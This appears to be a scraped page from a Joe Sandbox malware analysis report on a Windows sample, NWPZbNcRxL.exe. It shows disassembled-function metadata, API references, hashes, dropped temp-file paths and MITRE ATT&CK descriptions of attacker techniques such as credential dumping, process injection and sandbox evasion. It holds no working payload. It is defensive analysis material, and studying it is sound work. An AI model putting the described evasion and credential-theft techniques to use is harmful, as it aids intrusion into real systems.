Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
Instruction ID: 8324451a4ff0c47630ca8b77822833049f444d9bf7208b762ea79768511e5552
Opcode Fuzzy Hash: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
Instruction Fuzzy Hash: 7811C472D01114ABDF30DB99DC44BAEB7B8EB45320F158026E96DE7290D770EE0AE791

Function 00C821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C82255

Strings

<local>, xrefs: 00C8221D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
Instruction ID: e9b7d0f03d659e1b36fc0344ec38b2122036829aba3587c321cbbccd56930565
Opcode Fuzzy Hash: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
Instruction Fuzzy Hash: FA11C670541225BADB25AF51CCCCFBBFBA8FF16769F10822AF51586000D2705955D7F4

Function 00C68E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C68E73

Strings

ListBox, xrefs: 00C68E3D
ComboBox, xrefs: 00C68E12

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
Instruction ID: 3a2f88e5ee563e8f5f3287355f33d87c7a99400b11e9fff0bf4ea1215b9c0a63
Opcode Fuzzy Hash: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
Instruction Fuzzy Hash: BA0128B5601218ABCB24FBA0CC85DFE7368EF02320B400719F831672D2DE32580CEA50

Function 00C68CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C68D6B

Strings

ListBox, xrefs: 00C68D35
ComboBox, xrefs: 00C68D0A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
Instruction ID: d1c3cac79861d66e432649a892b0b4b4c2be268dd89ce792563775f9393bb427
Opcode Fuzzy Hash: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
Instruction Fuzzy Hash: B101D471A41109ABCF24EBE0C996EFE73A8DF16300F10012AB911772D2DE119E0CFA71

Function 00C68D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C68DEE

Strings

ListBox, xrefs: 00C68DBA
ComboBox, xrefs: 00C68D8F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
Instruction ID: 964ef9d91e145ee42f12d5a299d549964472eb75aac6a34c4351422e0bfd8173
Opcode Fuzzy Hash: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
Instruction Fuzzy Hash: 6C01A771A41109ABDB21E6A4C986EFE77ACDF12300F10011AB915732D2DE114E0DF671

Function 00C39402 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C399AC: __getptd_noexit.LIBCMT ref: 00C399AD

__lock.LIBCMT ref: 00C39443
_free.LIBCMT ref: 00C39470

Strings

`, xrefs: 00C39476, 00C3947E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __getptd_noexit__lock_free
String ID: `
API String ID: 1533244847-4168407445
Opcode ID: 5b24396f4963062a7cd30b9f2e0300e2fbad735bd3b8218bc48c2ed065d7bbef
Instruction ID: 572a749d9044832684bc0bd4c6096fd5f7c596be5a534c171ff02a83941e8907
Opcode Fuzzy Hash: 5b24396f4963062a7cd30b9f2e0300e2fbad735bd3b8218bc48c2ed065d7bbef
Instruction Fuzzy Hash: CB118432D217269BCB21AF6D940175DB3A0FB45B20F15411AF8B4A7280CBB45E43DFC6

Function 00C74F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C74F46
_wcscmp.LIBCMT ref: 00C74F58

Strings

#32770, xrefs: 00C74F52

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
Instruction ID: 93f9b53694ebe5274f6e40ba3adca7a87036a1670cdcbdad79170bb05823a235
Opcode Fuzzy Hash: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
Instruction Fuzzy Hash: 5AE0D8326002282BE7209B99EC49FABF7ACEB45B70F00006BFD04D3051EA609B55C7E1

Function 00C4B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00C4B314: _memset.LIBCMT ref: 00C4B321

Part of subcall function 00C30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C4B2F0,?,?,?,00C1100A), ref: 00C30945

IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C4B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C4B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C4B2FE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
Instruction ID: 866f2ba4c054e58de5f2c0504afd9582c560e53f466e8bb933da12d04d87a10d
Opcode Fuzzy Hash: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
Instruction Fuzzy Hash: 17E012B02007518FD720DF2AD50878A7BE4BF04755F11897DE496C7661EBF4D845CBA1

Function 00C95998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C959AE
PostMessageW.USER32(00000000), ref: 00C959B5

Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC

Strings

Shell_TrayWnd, xrefs: 00C959A7

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
Instruction ID: db4f6b5dedf980ed91e5d5cfb0d7543bafb16027f6badaa253d2075a58198b2a
Opcode Fuzzy Hash: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
Instruction Fuzzy Hash: 6DD0C9317843117BE664AB709C0FF9B6614AB04B50F01083AB25AEA1D1C9E0A801C654

Function 00C95964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C9596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C95981

Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC

Strings

Shell_TrayWnd, xrefs: 00C95967

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
Instruction ID: e8a5461aeff9dff259e766cf6a35c8adc37d9ffea9df459187bd9fbaf40035f6
Opcode Fuzzy Hash: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
Instruction Fuzzy Hash: C1D01231784311B7E664BB70DC0FFDB6A14BF00B50F01083EB35AEA1D1C9E09801C654

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NWPZbNcRxL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\J14f8-3

C:\Users\user\AppData\Local\Temp\acrorrheuma

C:\Users\user\AppData\Local\Temp\autCA7F.tmp

C:\Users\user\AppData\Local\Temp\autCACE.tmp

C:\Users\user\AppData\Local\Temp\nondefinition

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
NWPZbNcRxL.exe

Function 00C13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00C149A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00C14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00C79155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00C1301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00C13A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00C13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

